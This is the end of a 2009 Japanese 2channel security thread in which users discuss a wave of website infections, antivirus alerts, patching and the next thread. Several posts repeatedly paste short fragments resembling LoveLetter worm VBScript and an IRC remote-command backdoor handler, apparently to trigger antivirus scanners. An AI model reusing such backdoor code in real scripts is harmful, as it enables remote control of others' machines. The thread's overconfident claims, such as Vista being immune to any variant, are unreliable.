876名無しさん@お腹いっぱい。:2009/05/16(土) 13:11:12
・東方 音楽サークルの告知サイト
・ひぐらし 男性向けイラストサイト
・コナン ノマカプサイト
・オリJUNEサークルの告知サイト
・ヘタリアの携帯向け同盟サイト(PCレン鯖)

感染拡大しすぎwwっうぇ
877名無しさん@お腹いっぱい。:2009/05/16(土) 13:11:39
豚インフルエンザ並みの拡大状況でヤバイな
878名無しさん@お腹いっぱい。:2009/05/16(土) 13:11:44
さっきからこのスレ更新するとノートンが反応するんだが
879名無しさん@お腹いっぱい。:2009/05/16(土) 13:11:50
スレ開いた途端にラブレター検出したんだが偶然か
880名無しさん@お腹いっぱい。:2009/05/16(土) 13:12:19
PCがウイルスに感染しているかどうかを確かめるには、
やっぱかスペルスキーのオンラインスキャンが手っ取り早いね
881名無しさん@お腹いっぱい。:2009/05/16(土) 13:12:20
とりあえずFlash PlayerとAdobe Readerはupdateしといた
水面下で着々と感染させてってある日…ってなるのか
882名無しさん@お腹いっぱい。:2009/05/16(土) 13:12:21
>>866のせいじゃないか?
883名無しさん@お腹いっぱい。:2009/05/16(土) 13:12:24
>>878
俺のノートン先生寝てるぜ?
884名無しさん@お腹いっぱい。:2009/05/16(土) 13:12:26
>>878
俺もそうだwwwwww
avastでもそうだがdatに結構反応すんだよな
885名無しさん@お腹いっぱい。:2009/05/16(土) 13:12:27
まだニュー速にたたないの?
886名無しさん@お腹いっぱい。:2009/05/16(土) 13:12:47
このスレ開くとAVGが反応するんだが
>>567->>873の間に何か貼ったか?
887名無しさん@お腹いっぱい。:2009/05/16(土) 13:13:01
すげー伸びててワロタ
流石に皆異常に気付きだしたのか
888名無しさん@お腹いっぱい。:2009/05/16(土) 13:13:04
>>879
同じ。

さっきから何度か開いてるけど、今急になった。
ノートン先生が反応したっすよ。
889名無しさん@お腹いっぱい。:2009/05/16(土) 13:13:09
>>878,879
>>866のせいですw
890名無しさん@お腹いっぱい。:2009/05/16(土) 13:13:15
>>866だな
もー余計なことすんなよー
891名無しさん@お腹いっぱい。:2009/05/16(土) 13:13:16
>>835
違うところ変えてただけだった

俺の友達が感染したかもしれないらしい
892名無しさん@お腹いっぱい。:2009/05/16(土) 13:13:37
XP厨が阿鼻叫喚で楽しいな。
何も分からずVistaをバカにしてた罰が当たったとしか言えない。

sqlsodbc.chm が改変されてるかチェックとか言ってるけど、
Vistaなら改変を試みた時点でUACが反応するし。
893名無しさん@お腹いっぱい。:2009/05/16(土) 13:13:47
このスレに貼られてるURLやコードに反応してるのか
894名無しさん@お腹いっぱい。:2009/05/16(土) 13:13:54
おや?俺のノートン先生、とうとうお亡くなりになったのか。
895名無しさん@お腹いっぱい。:2009/05/16(土) 13:13:59
ノートンがラブレター拾うなら心配ないじゃん
896名無しさん@お腹いっぱい。:2009/05/16(土) 13:14:07
うちは反応しないな
専ブラで更新するだけじゃ反応はしないのか?
897名無しさん@お腹いっぱい。:2009/05/16(土) 13:14:23
>>684
ワロタw
898名無しさん@お腹いっぱい。:2009/05/16(土) 13:14:36
>>890
セキュリティソフトの設定調整すれ
899名無しさん@お腹いっぱい。:2009/05/16(土) 13:14:47
>>895
昔からノートン先生はラブレター大好きだよな。
900名無しさん@お腹いっぱい。:2009/05/16(土) 13:14:52
Windows7とavastだけどなんもさわがねーぞ
901名無しさん@お腹いっぱい。:2009/05/16(土) 13:15:34
>>899
お年を召してもときめきは忘れない爺ちゃんって感じだな
902名無しさん@お腹いっぱい。:2009/05/16(土) 13:15:46
>>892
言っておくが現時点だからなw
903名無しさん@お腹いっぱい。:2009/05/16(土) 13:15:53
次スレドコー
904名無しさん@お腹いっぱい。:2009/05/16(土) 13:16:10
>>866のせいかよーwびっくりするだろwww
905名無しさん@お腹いっぱい。:2009/05/16(土) 13:16:32
>>866ってJaneでスレ開いてもやばい?
906名無しさん@お腹いっぱい。:2009/05/16(土) 13:16:32
>>612
さっき落ちてきたのがこれ
907名無しさん@お腹いっぱい。:2009/05/16(土) 13:16:35
この不況だし感染企業潰れるかもな
908名無しさん@お腹いっぱい。:2009/05/16(土) 13:16:46
ん?専ブラなら無反応でおk?

次スレこれ?
http://pc11.2ch.net/test/read.cgi/sec/1242415108/
909名無しさん@お腹いっぱい。:2009/05/16(土) 13:16:53
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
910名無しさん@お腹いっぱい。:2009/05/16(土) 13:16:58
>>866
これなら先生も反応してくれるのにw

>>852
このウイルス機会に7の導入はスムーズに行くかもね
911名無しさん@お腹いっぱい。:2009/05/16(土) 13:17:31
>>883
878じゃないけどさっき先生アップデートしたら反応するようになっちゃった
ついでにbbs2chreaderの表示もちょっとおかしな事に・・・
既読の表示されなくなっちゃた
912名無しさん@お腹いっぱい。:2009/05/16(土) 13:17:35
ギコナビで見てたけどノートン2009が反応したので、
今VirtualBox+ubuntu+FireFoxで見てる。
913名無しさん@お腹いっぱい。:2009/05/16(土) 13:17:44
>>909
お前まじで氏ね
914名無しさん@お腹いっぱい。:2009/05/16(土) 13:17:53
次スレ立てる奴は重複防止の為、宣言する事!

どうする?削除依頼出ているスレを実質6として使うか
新しく立てるか?
915名無しさん@お腹いっぱい。:2009/05/16(土) 13:17:57

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
916名無しさん@お腹いっぱい。:2009/05/16(土) 13:18:05
>>910
まさか…そのために奴らが動い
917名無しさん@お腹いっぱい。:2009/05/16(土) 13:18:06
専ブラで反応した
また貼った奴いるなぁめんどくせ
918名無しさん@お腹いっぱい。:2009/05/16(土) 13:18:41
専ブラのログのフォルダをスキャンから除外しとけばいいだけじゃん
919名無しさん@お腹いっぱい。:2009/05/16(土) 13:18:42
>>911
ログの削除
920名無しさん@お腹いっぱい。:2009/05/16(土) 13:18:45
>>892
VistaでもUAC切った奴が感染したって報告が同人スレのほうであったみたい
でもjavascriptにはNT6系(Vista、Win7)の判定で狙われないわけでUACがONかOFFかは関係ないと思うんだけど
そこらへんがよく分からない
921名無しさん@お腹いっぱい。:2009/05/16(土) 13:18:45
てかさ、avast入れてても反応しないよ
922名無しさん@お腹いっぱい。:2009/05/16(土) 13:18:46
avast入れてJaneで見てるけどまったく反応しないんだが…
923名無しさん@お腹いっぱい。:2009/05/16(土) 13:18:49
未だに2chのログで検知誤爆してる奴ってなんなの?死ねよ
924名無しさん@お腹いっぱい。:2009/05/16(土) 13:18:49
気にしない 気にしない
925名無しさん@お腹いっぱい。:2009/05/16(土) 13:18:57
愉快犯がやってるっぽいね、今さらだけどここID無しなのね
IDあぼーんできないのか
926名無しさん@お腹いっぱい。:2009/05/16(土) 13:19:13
avastはここに落ちてるのは拾わないな
927名無しさん@お腹いっぱい。:2009/05/16(土) 13:19:22
騒がれだしたら急に嬉々として張り出したな
ばかか
928名無しさん@お腹いっぱい。:2009/05/16(土) 13:19:38
>>902
sqlsodbc.chm を利用しない方法はいくらでもあるだろうけど、
UACに反応せずシステムを書き換える方法は一つもない。
どんな亜種が出てきてもVistaなら大丈夫と言い切れる。
929名無しさん@お腹いっぱい。:2009/05/16(土) 13:19:39
avast入れててギコで見てるが、なんも反応ないぜよ?
930名無しさん@お腹いっぱい。:2009/05/16(土) 13:20:00
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-


例外設定くらいしておけよカスどもww
931名無しさん@お腹いっぱい。:2009/05/16(土) 13:20:11
avast入れてjane使ってるが何も反応ない
932名無しさん@お腹いっぱい。:2009/05/16(土) 13:20:27
会社のマシンやられたってやつ

これで通報しておけよ

http://www.ipa.go.jp/security/format/report-format.html
933名無しさん@お腹いっぱい。:2009/05/16(土) 13:20:38
専ブラで反応しないからfirefoxでこのスレ見たけど反応しなかった
934名無しさん@お腹いっぱい。:2009/05/16(土) 13:20:45
>>759
冷静に考えたら納得した、すまんw
935名無しさん@お腹いっぱい。:2009/05/16(土) 13:20:45
AviraでJaneだけど反応しないぜ
936名無しさん@お腹いっぱい。:2009/05/16(土) 13:21:02
あら?俺のノートン先生、朝アップデートかけたけど無反応だな。
起きろよノートンじいちゃん!

いや、起きないのが普通なのか?どっちやねん。
937名無しさん@お腹いっぱい。:2009/05/16(土) 13:21:53
CPUが大きく上下してる・・・。
>>866ってなんなの?
専ブラでもだめなのか
938名無しさん@お腹いっぱい。:2009/05/16(土) 13:22:27
AVGもスルーなの?
939名無しさん@お腹いっぱい。:2009/05/16(土) 13:22:30
>>932
まピョーん☆
940名無しさん@お腹いっぱい。:2009/05/16(土) 13:22:36
起きたら誤検知w>>936
941名無しさん@お腹いっぱい。:2009/05/16(土) 13:22:58
専ブラでは感染しないよ
942名無しさん@お腹いっぱい。:2009/05/16(土) 13:22:58
無知が雪崩れ込んできてる訳だが
943名無しさん@お腹いっぱい。:2009/05/16(土) 13:23:02
ニュー速は豚しか騒いでないのな
944名無しさん@お腹いっぱい。:2009/05/16(土) 13:23:04
avast以外はほんとにどうしようもないな
945名無しさん@お腹いっぱい。:2009/05/16(土) 13:23:15
>>940
寝てて良いわけね。
946名無しさん@お腹いっぱい。:2009/05/16(土) 13:23:22
>>937
専ブラで設定しれ
947名無しさん@お腹いっぱい。:2009/05/16(土) 13:23:29
ノートン先生さっきからなんか遮断しまくってるけど
948名無しさん@お腹いっぱい。:2009/05/16(土) 13:23:50
ここのコードだけで感染しますん
949名無しさん@お腹いっぱい。:2009/05/16(土) 13:23:51
こういう時のために、日頃からエロ画像や動画を蓄えておくのが大事なんだよな
備えあれば憂いなし
950名無しさん@お腹いっぱい。:2009/05/16(土) 13:23:53
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
951名無しさん@お腹いっぱい。:2009/05/16(土) 13:24:13
あ・・・らぶれたー・・・
952名無しさん@お腹いっぱい。:2009/05/16(土) 13:24:41
>>950
は?お前何なの?
953名無しさん@お腹いっぱい。:2009/05/16(土) 13:25:04
954名無しさん@お腹いっぱい。:2009/05/16(土) 13:25:32
重要情報を勝手に外部に送信するプログラムとかも仕込まれるのかな?
pixivの管理者が感染してpixivユーザーのメアドとIDがセットで流出したら阿鼻叫喚の地獄絵図になりそう。
(エロ絵描いてる人とか特に)

個人情報を登録してるショップや企業も情報が漏れたりして。

955名無しさん@お腹いっぱい。:2009/05/16(土) 13:25:52
>>948 どっちなのか、わかりますん
956名無しさん@お腹いっぱい。:2009/05/16(土) 13:26:05
誰かコイツ通報しろよ
957名無しさん@お腹いっぱい。:2009/05/16(土) 13:26:08
コード貼ってるやつ抽出して規制議論でいいだろ
いちいち誰かが反応して話が途切れる
958名無しさん@お腹いっぱい。:2009/05/16(土) 13:26:10
Outpostでシステム全体のルールとして設定したからもう安心だ
959名無しさん@お腹いっぱい。:2009/05/16(土) 13:26:50
2chにいれば安全だな
960名無しさん@お腹いっぱい。:2009/05/16(土) 13:27:43
>>954
pixivは今回の騒ぎに全然対応してくれてないみたいだからもし実現するとエラいことになるな
961名無しさん@お腹いっぱい。:2009/05/16(土) 13:28:06
2ちゃんねるが侵されたら
ねらー全滅か?
962名無しさん@お腹いっぱい。:2009/05/16(土) 13:28:43
>>960
そりゃpixivは感染してないんだから無関係だし。
対応とか意味分からん。
963名無しさん@お腹いっぱい。:2009/05/16(土) 13:28:44
>>961
携帯でアクセスすればおk
964名無しさん@お腹いっぱい。:2009/05/16(土) 13:29:05
情報抜かれてもへっちゃらな人はモーマンタイ?
965名無しさん@お腹いっぱい。:2009/05/16(土) 13:29:35
たらればの話は情報混乱するからやめとけ
966名無しさん@お腹いっぱい。:2009/05/16(土) 13:29:35
おう
967947:2009/05/16(土) 13:29:43
あーごめん、ログちゃんと読んでなかった
つか自動あぼんされてた
コード貼ってあったのか、自己解決
968名無しさん@お腹いっぱい。:2009/05/16(土) 13:29:49
2ちゃんねるが侵されたらIEなんかで見たらだめだろうが
専ブラで見ている限り2chや対応掲示板は安全
969名無しさん@お腹いっぱい。:2009/05/16(土) 13:30:01
>>915
これって他のスレでもたまに見るけどなんなの?
970名無しさん@お腹いっぱい。:2009/05/16(土) 13:31:06
>>969
ノートン先生に宛てたラブレター
971名無しさん@お腹いっぱい。:2009/05/16(土) 13:31:21
一日5人前後の訪問者しかいないサイト持ちで
半年以上更新してなかったが
ある意味良かったのかもしれんな
972名無しさん@お腹いっぱい。:2009/05/16(土) 13:31:23
数ある俺のセキュリティソフトを幾ら駆使しても未知のウィルスには無意味なんですね
973名無しさん@お腹いっぱい。:2009/05/16(土) 13:31:56
変なこと聞くけど、Live2chも専ブラだよね?
974名無しさん@お腹いっぱい。:2009/05/16(土) 13:32:10
関西在住だけど神戸のインフルエンザよりこっちのが怖いよぉ
975名無しさん@お腹いっぱい。:2009/05/16(土) 13:32:12
>>970
ノートン先生にだけ反応する〜みたいなやつか、俺には関係ないな
976名無しさん@お腹いっぱい。:2009/05/16(土) 13:32:13
そんあコード貼られるのも想定内
977名無しさん@お腹いっぱい。:2009/05/16(土) 13:32:14
>>961
日本のネットワークがマヒ状態。
978名無しさん@お腹いっぱい。:2009/05/16(土) 13:32:16
てか、2chのサーバーを運営している会社もやられてたような・・・
979名無しさん@お腹いっぱい。:2009/05/16(土) 13:32:18
>>972
Vista使えばいい。別に7でもいいけど。
980名無しさん@お腹いっぱい。:2009/05/16(土) 13:32:24
同人スレの人達が何人か「pixivトップでウィルス注意喚起してくれ」ってメールしたけど
総スルー中らしい
pixivやってるひとはサイト持ち多いだろうし
現にランカーで東方大手サークルのサイトが感染
981名無しさん@お腹いっぱい。:2009/05/16(土) 13:32:49
>>706
更新日なんて・・・
そのファイル保護下に入っているんだっけ?
ないから感染するんだよな。
982名無しさん@お腹いっぱい。:2009/05/16(土) 13:33:08
こええええええ
983名無しさん@お腹いっぱい。:2009/05/16(土) 13:33:17
>>979
今のうちだけじゃね?
984名無しさん@お腹いっぱい。:2009/05/16(土) 13:33:52
恐怖はいつまで続く
985名無しさん@お腹いっぱい。:2009/05/16(土) 13:33:54
>>980
そりゃスルーするだろ。pixiv関係ないもん。
何かウイルスが流行る度にpixivに注意喚起させる気かよ。
986名無しさん@お腹いっぱい。:2009/05/16(土) 13:33:59
埋めますか
987名無しさん@お腹いっぱい。:2009/05/16(土) 13:34:14
ソースチェッカーオンラインが感染したら大変なことになりそう
988名無しさん@お腹いっぱい。:2009/05/16(土) 13:34:33
次スレは?
989名無しさん@お腹いっぱい。:2009/05/16(土) 13:34:34
ニュー速にスレが立ってもおかしくないレベル
990名無しさん@お腹いっぱい。:2009/05/16(土) 13:34:38
ドリキャスとキーボードこの前売っちまったw
991名無しさん@お腹いっぱい。:2009/05/16(土) 13:34:40
ほんとに次スレここでおk?
http://pc11.2ch.net/test/read.cgi/sec/1242415108/
992名無しさん@お腹いっぱい。:2009/05/16(土) 13:34:58
>>983
UACがあるから根本的にXP以前とは違う。
このウイルスをVistaに感染させることはできないよ。
993名無しさん@お腹いっぱい。:2009/05/16(土) 13:35:09
ume
994名無しさん@お腹いっぱい。:2009/05/16(土) 13:35:13
1000
995名無しさん@お腹いっぱい。:2009/05/16(土) 13:35:39
1000
996名無しさん@お腹いっぱい。:2009/05/16(土) 13:35:42
次スレ(゜Д゜≡゜Д゜)?どこ?
997名無しさん@お腹いっぱい。:2009/05/16(土) 13:36:06
1000なら2ちゃんも感染
998名無しさん@お腹いっぱい。:2009/05/16(土) 13:36:10
スレ眺めてるだけで一日が過ぎそう
999名無しさん@お腹いっぱい。:2009/05/16(土) 13:36:15
1000
1000名無しさん@お腹いっぱい。:2009/05/16(土) 13:36:25
∞      ∞
  ∞
 ∞   ∞
     ヽ[゚д゚]ノ シンガタテフテフ
       [_]
       < \
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。